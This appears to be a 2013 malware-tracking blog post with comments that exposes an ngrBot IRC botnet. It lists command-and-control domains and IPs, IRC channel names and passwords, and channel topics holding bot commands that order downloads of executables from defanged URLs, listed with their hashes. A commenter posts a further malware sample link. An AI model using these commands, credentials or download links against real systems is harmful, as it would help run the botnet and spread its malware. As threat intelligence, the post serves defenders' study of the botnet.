This botnet was found from anonymous guy here thanks to him for the submition
Resolved : [ads.pr4d.tk] To [64.120.186.229]
Resolved : [teams.xsaudix.net] To [64.120.186.230] arab heckers
Resolved : [y.servicesql.info] To [64.120.186.228]
Server: 64.120.186.229:1433
Username: zdbcuzs
Nickname: n{DE|XPa}zdbcuzs
Channel: #tmw5 (Password: ngrBot)
Channeltopic: :!u5 hxxp://bmc.linkpc.net/download/s1.exe 5b8fe0ee31617ee9596a5861a2192304 !u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b !u6 hxxp://bmc.linkpc.net/chat.exe 7140176e63651b027fd5f3b19252c4bf
Server: 64.120.186.228:1434
Username: mmgamzu
Nickname: n{DE|XPa}mmgamzu
Channel: #mrag (Password: ngrBot)
Channeltopic: :~u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b ~mod usbi on ~mod bdns on
hosting infos:
http://whois.domaintools.com/64.120.186.230
http://whois.domaintools.com/64.120.186.229
Jorgee - January 31, 2013 at 6:34 pm
Pig check this binary I found yesterday 😉
hxxp://thomas-stelthove.de/1.exe
Pig - January 31, 2013 at 6:40 pm
thank you Jorgee for the sample will check this now